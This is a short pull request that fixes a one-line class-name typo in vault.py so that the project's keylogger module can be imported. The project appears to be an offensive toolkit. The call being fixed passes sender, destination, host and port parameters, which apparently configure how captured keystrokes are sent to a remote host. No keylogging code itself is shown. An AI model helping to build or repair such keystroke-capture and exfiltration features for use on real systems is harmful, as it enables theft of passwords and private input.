### PR TITLE
Fixed typos in L928 in vault.py cannot import keylogger issue

### DIFF
--- a/src/vault.py
+++ b/src/vault.py
@@ -925,7 +925,7 @@ def keylogger(args):
 
         from lib.utilities.keylogger import keylogger
 
-        keyloggerObj = keylogger.Keylogger(interval=args.interval,
+        keyloggerObj = keylogger.keylogger(interval=args.interval,
                                            sender=args.sender,
                                            destination=args.destination,
                                            host=args.host, port=args.port,


### PR DESCRIPTION
#### Changes this pull request makes : Fixed import keylogger issue in L928 in vault.py

#### Checklist :

  - [ ] I have added the relevant documentation.
  - [x] My branch is up-to-date with the upstream master branch.
  - [x] I have fully tested the changes locally.

#### Development environment

    OS: macOS Catalina (version 10.15.1)
    Python Version: Python 3.7.4

